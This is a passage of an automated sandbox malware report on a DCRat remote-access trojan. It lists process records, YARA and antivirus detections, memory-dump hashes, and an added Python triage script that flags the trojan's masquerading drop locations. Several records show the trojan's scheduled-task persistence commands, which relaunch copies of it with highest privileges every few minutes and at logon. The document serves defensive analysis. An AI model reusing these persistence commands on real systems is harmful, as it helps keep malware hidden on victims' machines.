
                Target ID:11
                Start time:21:36:56
                Start date:28/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 7 /tr "'C:\Users\Public\AccountPictures\Registry.exe'" /f
                Imagebase:0x7ff75ca00000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:12
                Start time:21:36:56
                Start date:28/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Users\Public\AccountPictures\Registry.exe'" /rl HIGHEST /f
                Imagebase:0x7ff75ca00000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:13
                Start time:21:36:56
                Start date:28/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 11 /tr "'C:\Users\Public\AccountPictures\Registry.exe'" /rl HIGHEST /f
                Imagebase:0x7ff75ca00000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:14
                Start time:21:36:56
                Start date:28/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 10 /tr "'C:\Users\user\StartMenuExperienceHost.exe'" /f
                Imagebase:0x7ff75ca00000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:15
                Start time:21:36:56
                Start date:28/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Users\user\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                Imagebase:0x7ff75ca00000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:16
                Start time:21:36:56
                Start date:28/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 12 /tr "'C:\Users\user\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                Imagebase:0x7ff75ca00000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:17
                Start time:21:36:56
                Start date:28/12/2024
                Path:C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe"
                Imagebase:0xb40000
                File size:2'403'328 bytes
                MD5 hash:97177514CAB51539083EF130F005BBD1
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000011.00000002.2085969443.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Antivirus matches:
                • Detection: 79%, ReversingLabs
                Has exited:true

                Target ID:18
                Start time:21:36:57
                Start date:28/12/2024
                Path:C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe"
                Imagebase:0xf80000
                File size:2'403'328 bytes
                MD5 hash:97177514CAB51539083EF130F005BBD1
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000012.00000002.2132989514.0000000003461000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Antivirus matches:
                • Detection: 100%, Avira
                • Detection: 100%, Joe Sandbox ML
                • Detection: 79%, ReversingLabs
                Has exited:true

                Target ID:19
                Start time:21:36:57
                Start date:28/12/2024
                Path:C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe"
                Imagebase:0x130000
                File size:2'403'328 bytes
                MD5 hash:97177514CAB51539083EF130F005BBD1
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000013.00000002.2140699573.0000000002551000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Has exited:true

                Target ID:20
                Start time:21:36:57
                Start date:28/12/2024
                Path:C:\Users\Public\AccountPictures\Registry.exe
                Wow64 process (32bit):false
                Commandline:C:\Users\Public\AccountPictures\Registry.exe
                Imagebase:0xab0000
                File size:2'403'328 bytes
                MD5 hash:97177514CAB51539083EF130F005BBD1
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000014.00000002.2148302161.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000014.00000002.2148302161.0000000002EBB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Antivirus matches:
                • Detection: 100%, Avira
                • Detection: 100%, Joe Sandbox ML
                • Detection: 79%, ReversingLabs
                Has exited:true

                Target ID:21
                Start time:21:36:57
                Start date:28/12/2024
                Path:C:\Users\Public\AccountPictures\Registry.exe
                Wow64 process (32bit):false
                Commandline:C:\Users\Public\AccountPictures\Registry.exe
                Imagebase:0x5f0000
                File size:2'403'328 bytes
                MD5 hash:97177514CAB51539083EF130F005BBD1
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000015.00000002.2143381456.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Has exited:true

                Target ID:22
                Start time:21:36:57
                Start date:28/12/2024
                Path:C:\Users\user\StartMenuExperienceHost.exe
                Wow64 process (32bit):false
                Commandline:C:\Users\user\StartMenuExperienceHost.exe
                Imagebase:0x6a0000
                File size:2'403'328 bytes
                MD5 hash:97177514CAB51539083EF130F005BBD1
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000016.00000002.2153356357.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Antivirus matches:
                • Detection: 100%, Avira
                • Detection: 100%, Joe Sandbox ML
                • Detection: 79%, ReversingLabs
                Has exited:true

                Target ID:23
                Start time:21:36:57
                Start date:28/12/2024
                Path:C:\Users\user\StartMenuExperienceHost.exe
                Wow64 process (32bit):false
                Commandline:C:\Users\user\StartMenuExperienceHost.exe
                Imagebase:0xa70000
                File size:2'403'328 bytes
                MD5 hash:97177514CAB51539083EF130F005BBD1
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000017.00000002.2151848592.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Has exited:true

                Target ID:24
                Start time:21:36:57
                Start date:28/12/2024
                Path:C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files (x86)\autoit3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe"
                Imagebase:0xdb0000
                File size:2'403'328 bytes
                MD5 hash:97177514CAB51539083EF130F005BBD1
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000018.00000002.2148234479.000000000334D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000018.00000002.2148234479.0000000003311000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Antivirus matches:
                • Detection: 100%, Avira
                • Detection: 100%, Avira
                • Detection: 100%, Joe Sandbox ML
                • Detection: 100%, Joe Sandbox ML
                • Detection: 79%, ReversingLabs
                Has exited:true

                Target ID:25
                Start time:21:36:57
                Start date:28/12/2024
                Path:C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files (x86)\autoit3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe"
                Imagebase:0x730000
                File size:2'403'328 bytes
                MD5 hash:97177514CAB51539083EF130F005BBD1
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000019.00000002.2152498750.0000000002BAF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000019.00000002.2152498750.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Has exited:true
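Targets 23 to 25 above show one binary, with the submitted sample's MD5 (97177514cab51539083ef130f005bbd1), re-launched from two places a legitimate program would not use: the user profile root under the name of a Windows component, and a third-party application directory (AutoIt3) under a random-looking name. The Python script below is an added triage example, not Joe Sandbox code and not part of the original report. It parses records in the report's own key:value layout (a constructed excerpt of Targets 23 to 25 plus one made-up benign record is embedded), keeps only processes whose MD5 matches the sample, and flags those drop locations. The genuine directory of StartMenuExperienceHost.exe and the random-name threshold are the example's own assumptions, not values taken from the report.

```python
"""Added triage example (not Joe Sandbox code): flag where copies of the sample ran from.

Parses 'Target ID' process records in the plain key:value layout the report uses,
keeps the ones whose MD5 equals the submitted sample's, and reports the
persistence and masquerading patterns visible in Targets 23 to 25.
"""
import re
from pathlib import PureWindowsPath

# MD5 of oFAjWuoHBq.exe as given in the report.
SAMPLE_MD5 = "97177514cab51539083ef130f005bbd1"

# Constructed excerpt mirroring Targets 23..25, plus one constructed benign
# record (Target 99, made-up MD5) to show that unrelated processes are ignored.
SAMPLE_REPORT = """\
Target ID:23
Start time:21:36:57
Path:C:\\Users\\user\\StartMenuExperienceHost.exe
Commandline:C:\\Users\\user\\StartMenuExperienceHost.exe
File size:2'403'328 bytes
MD5 hash:97177514CAB51539083EF130F005BBD1
Has elevated privileges:true

Target ID:24
Start time:21:36:57
Path:C:\\Program Files (x86)\\AutoIt3\\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe
Commandline:"C:\\Program Files (x86)\\autoit3\\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe"
File size:2'403'328 bytes
MD5 hash:97177514CAB51539083EF130F005BBD1
Has elevated privileges:true

Target ID:25
Start time:21:36:57
Path:C:\\Program Files (x86)\\AutoIt3\\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe
Commandline:"C:\\Program Files (x86)\\autoit3\\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe"
File size:2'403'328 bytes
MD5 hash:97177514CAB51539083EF130F005BBD1
Has elevated privileges:true

Target ID:99
Start time:21:36:58
Path:C:\\Windows\\System32\\conhost.exe
Commandline:conhost.exe
File size:1 bytes
MD5 hash:00000000000000000000000000000000
Has elevated privileges:false
"""

# Where the genuine Windows component of that name lives. Practitioner knowledge
# and an assumption of this example, not a value taken from the report.
EXPECTED_DIRS = {
    "startmenuexperiencehost.exe": "c:\\windows\\systemapps\\",
}


def parse_records(text):
    """Split the report text into one dict per 'Target ID' block."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        rec = {}
        for line in block.splitlines():
            key, sep, value = line.partition(":")   # first ':' separates key and value
            if sep:
                rec[key.strip()] = value.strip()
        if "Target ID" in rec:
            records.append(rec)
    return records


def looks_random(stem):
    """Crude heuristic (assumed threshold): long, letters only, unusually many capitals."""
    if len(stem) < 16 or not stem.isalpha():
        return False
    return sum(c.isupper() for c in stem) / len(stem) >= 0.3


def path_findings(path):
    """Return the suspicious properties of the location a copy was launched from."""
    p = PureWindowsPath(path)
    parts = [s.lower().rstrip("\\") for s in p.parts]   # ['c:', 'users', 'user', 'x.exe']
    findings = []
    if len(parts) == 4 and parts[1] == "users":
        findings.append("copy in user profile root")
    if len(parts) >= 4 and parts[1].startswith("program files") \
            and not parts[2].startswith(("windows", "microsoft", "common files")):
        findings.append("copy in third-party application directory")
    if looks_random(p.stem):
        findings.append("random-looking file name")
    expected = EXPECTED_DIRS.get(p.name.lower())
    if expected and not str(p).lower().startswith(expected):
        findings.append("mimics a Windows component outside its real directory")
    return findings


def triage(text, sample_md5=SAMPLE_MD5):
    """Map every distinct path the sample ran from to its findings."""
    result = {}
    for rec in parse_records(text):
        if rec.get("MD5 hash", "").lower() != sample_md5.lower():
            continue                      # not a copy of the sample
        path = rec["Path"]
        if path not in result:            # Targets 24 and 25 share a path
            result[path] = path_findings(path)
    return result


if __name__ == "__main__":
    for path, found in triage(SAMPLE_REPORT).items():
        print(path, "->", ", ".join(found) or "nothing flagged")
```

Filtering on the sample's MD5 first is what keeps the location heuristics from firing on every installed third-party program: only paths that a byte-identical copy of the sample actually ran from are examined, which is exactly the pattern the report's "Drops PE files to the user root directory" and "Drops executable to a common third party application directory" signatures describe.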

                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID: Z_H
                  • API String ID: 0-256909865
                  • Opcode ID: 7021c247c87dfe50f743bca6e1f50875c74c64a8a722466008ff166a4f6494c5
                  • Instruction ID: 2b482f1550394c6f070d5e4d079f8c0d03d6b3c97688a10c32a13b9c3bf7b670
                  • Opcode Fuzzy Hash: 7021c247c87dfe50f743bca6e1f50875c74c64a8a722466008ff166a4f6494c5
                  • Instruction Fuzzy Hash: 60F1B071D1DA4A8FEB45EB28C8587A9BFE1FF5A340F4400BAC009C72D2EB786545CB51
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: feedb37ac3c02aa2b1a54b5370eefb08ef89bbc5d0940b7eb302aed2b71ed30d
                  • Instruction ID: 7cb6ff8f56dd571d7dee7942c8d9278362a9b155ab025471660c607804c5895a
                  • Opcode Fuzzy Hash: feedb37ac3c02aa2b1a54b5370eefb08ef89bbc5d0940b7eb302aed2b71ed30d
                  • Instruction Fuzzy Hash: 67928D3090D6898FDB46EB3488696A97FF0FF1A301F0545FBD449CB1A2EB38A985C751
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7ba0730d07173a94fdbd7f2f2678ee0fecbacb24ab1c6865b3704c1e9a95c3df
                  • Instruction ID: b58602e7d31e5c699bb295b341635d7242d6658cb838ef27bbd5d3df37823ac5
                  • Opcode Fuzzy Hash: 7ba0730d07173a94fdbd7f2f2678ee0fecbacb24ab1c6865b3704c1e9a95c3df
                  • Instruction Fuzzy Hash: 8E02AB3490D68A8FEB95FB2888596FA7BF0FF5A341F0405BBD449C7192EB38A444CB54
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d95f1ee17d359904047b199bd8069ec81712dd271888e9da9d4c655de6edbda7
                  • Instruction ID: 2cbc7cce31f3575a5ace444c6ac76e6fdd634acb0ea31a10f7707a9fcbbbbcb5
                  • Opcode Fuzzy Hash: d95f1ee17d359904047b199bd8069ec81712dd271888e9da9d4c655de6edbda7
                  • Instruction Fuzzy Hash: 58D18C3090D69E8FEB99EF2488592FA7BA0FF55341F0405BBD809C71D2DB38A994C785
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ac51897cac7c14bf1f69a28fe11011ee63af59b8886447ecc204cd623916f413
                  • Instruction ID: 894d81e3b8acc50f0e9c8c5980711a400c07e0ef7c1df84ffb59ab8a9e5dca5d
                  • Opcode Fuzzy Hash: ac51897cac7c14bf1f69a28fe11011ee63af59b8886447ecc204cd623916f413
                  • Instruction Fuzzy Hash: 00C1CD3090D68A8FE746EB2888996FA7BF0FF5A341F0545BBD409C70D2EB38A584C715
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 60d908f5974ddd7e59801e5938fe7eae094eca4997e3244c05b2a2afbed71a5c
                  • Instruction ID: 126aabb0369e4e3dc8986808b3114af57b12ccdca5919f49a7032cbec3b212a6
                  • Opcode Fuzzy Hash: 60d908f5974ddd7e59801e5938fe7eae094eca4997e3244c05b2a2afbed71a5c
                  • Instruction Fuzzy Hash: 4BD18F3494E78A8FEB56AB2488192FA3FB0FF16350F0505BBD848C70D2FB28A559C755
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9a6404acb97840e69e6c688401738e27453848c03daad84bccfca90ae11209c3
                  • Instruction ID: 07b28a53818993eb8d6b72a15b14ee2524a0af60422dc55c66a3c9b8c6e03759
                  • Opcode Fuzzy Hash: 9a6404acb97840e69e6c688401738e27453848c03daad84bccfca90ae11209c3
                  • Instruction Fuzzy Hash: 4DD19F30D0D68E8FEB52FBB888596B97BE0EF1A341F0445B6D409C71E2EB38A544C765
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3f1f6d1c34cc92e23f216e22a4cc327dd4a3a9a9ab7f66737afba93fe39a5710
                  • Instruction ID: 9e71ea6fef285acb359aa77d08a6dee7240c79a60720edf0dca3822d3d09265d
                  • Opcode Fuzzy Hash: 3f1f6d1c34cc92e23f216e22a4cc327dd4a3a9a9ab7f66737afba93fe39a5710
                  • Instruction Fuzzy Hash: 19D10630D1966ACFDBA8EB68C4546BDB7B1FF59341F1000B9D40EE3292CB396881CB55
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b317efab2036d4964cdc01cfb0f9861c8a68265f905d28742dce7e5a1001dfbc
                  • Instruction ID: fca3e2a8067d72c5aa9547080ac87aafb27978f42723a1f1b2deab3ea377efee
                  • Opcode Fuzzy Hash: b317efab2036d4964cdc01cfb0f9861c8a68265f905d28742dce7e5a1001dfbc
                  • Instruction Fuzzy Hash: CFB15A30D0D6498FEB55EB68C8586A9BBF0EF5A341F0441BAD409D71D2EB38A944CB25
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0964de2388401cf63ac51a6db1a90acc7837a1f69d3cc8765d25e8321b413acc
                  • Instruction ID: 6e2ff3c43f32574e64fb24954cb029fecec1398190294a58f3da3f8f0c4e0cfa
                  • Opcode Fuzzy Hash: 0964de2388401cf63ac51a6db1a90acc7837a1f69d3cc8765d25e8321b413acc
                  • Instruction Fuzzy Hash: DB91E331A0DA8E8FDB59EF2888555BA7BE1FF96340F1041BED449C32C2EB34A845C745
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bce1b83f66b22066e45c8f74a44af44ad1504dc27ea405cbc673423f53459e27
                  • Instruction ID: 8b3191ea57b5ef2fb44d878241237d95289a0dbd8490ca2145eef06f2a49afd9
                  • Opcode Fuzzy Hash: bce1b83f66b22066e45c8f74a44af44ad1504dc27ea405cbc673423f53459e27
                  • Instruction Fuzzy Hash: 2691FE34D0D68A8FEB56EF2888582FA7FE0FF5A301F0445BAD409CB192EB38A554C754
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 94bde5934a64c5416881cefe4a426375c6af97524adc87d4e7a3bdd0c57684bd
                  • Instruction ID: 4934711b1d5cb500458ffeded77913ce8c60862436ad7d0786edaece21cfbfc5
                  • Opcode Fuzzy Hash: 94bde5934a64c5416881cefe4a426375c6af97524adc87d4e7a3bdd0c57684bd
                  • Instruction Fuzzy Hash: A5819E30A1DA4E8FDB49EF2888555BA77E1FF99341F10457ED40AC32D2EB34A881C745
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 19363512496a44328e2aa240351729444f0339b86fdc4a7a71706024d79ab2e1
                  • Instruction ID: 9792fff360a7457e435f2ba5b95e8931504c68bf42a0230cb7243a60766a834f
                  • Opcode Fuzzy Hash: 19363512496a44328e2aa240351729444f0339b86fdc4a7a71706024d79ab2e1
                  • Instruction Fuzzy Hash: 0791AE70D0DA4A8FEB59EF68C8596BA7BE0FF5A341F0404BAD409D71D2EB34A484C751
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e6751fba056d35de343ceb4c841314f22c18b3b9c96ac9a2fd111386a96ce125
                  • Instruction ID: 0e6c40972f246664bd50e31d28ce3d1f95a96804cc8a9d0f98cf202cc3d3ee00
                  • Opcode Fuzzy Hash: e6751fba056d35de343ceb4c841314f22c18b3b9c96ac9a2fd111386a96ce125
                  • Instruction Fuzzy Hash: 84A19E30D0D65A8FEB69EB6488557B877A0FF46340F1041BAD44DD71C2EF786984CB68
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 60ef26250cbcfa9252a7a40b39e250fddde730e445adc78041c38dd13d9b42ec
                  • Instruction ID: 0f51ffb96b85c09f23da4442425e2f4932964165999a97efac4272fcf2316131
                  • Opcode Fuzzy Hash: 60ef26250cbcfa9252a7a40b39e250fddde730e445adc78041c38dd13d9b42ec
                  • Instruction Fuzzy Hash: 80719B31A0CA4A8FDB49EF1C88516A977E2FF9A744F14457AE44EC32C6DF34A842C785
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5bfd2036c0b0f75dfef4d1ad320cdca2b43a90ddf8e10cd107ccb3ac77a4669d
                  • Instruction ID: d2a88579ca9229cfe4c48da3d67da7ebae369d9c0c3535999fbf2d6870a92211
                  • Opcode Fuzzy Hash: 5bfd2036c0b0f75dfef4d1ad320cdca2b43a90ddf8e10cd107ccb3ac77a4669d
                  • Instruction Fuzzy Hash: F1815A3091D69E8FEB95FF2488592FA7BB0FF59341F0405BAE809C7192DB38A944CB45
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 20f773504fc3f89b54649fdbfd5045ce8948cbc37935eaeaa26a2752a3e73580
                  • Instruction ID: 3a995ddb90de056cc26109281058e033b360583838eadffef9673ef35b9a3203
                  • Opcode Fuzzy Hash: 20f773504fc3f89b54649fdbfd5045ce8948cbc37935eaeaa26a2752a3e73580
                  • Instruction Fuzzy Hash: 5C61AE31A1DA4A8FDB49EF1888555BA77E2FF99344F10457EE44AC32C2EF34A842C785
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c559605216bf1cee71584ecb4002b2cc81950ba60fcc039dd57abf8d58844f20
                  • Instruction ID: 20ce8efac3e93541e73cf170a9b2880081c0d4236ca5e1420ea216bdbfa15b53
                  • Opcode Fuzzy Hash: c559605216bf1cee71584ecb4002b2cc81950ba60fcc039dd57abf8d58844f20
                  • Instruction Fuzzy Hash: 90719E3090DA4A8FEB95EB28C8586F97BE0FF19350F1404BAD409C71D6EF78A984C755
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7988e7074885900f37008aca5d3337f8c49f50860db4e6c9ead92b36285dd034
                  • Instruction ID: 6e071e7ab03d2dcaec9f7f1ebdba56390880cac94a472fee5c651be6007485d0
                  • Opcode Fuzzy Hash: 7988e7074885900f37008aca5d3337f8c49f50860db4e6c9ead92b36285dd034
                  • Instruction Fuzzy Hash: F071773090C69E8FEB99FF2488592BA7BB1FF59341F0005BAD809C7192DB39A944CB45
                  Memory Dump Source
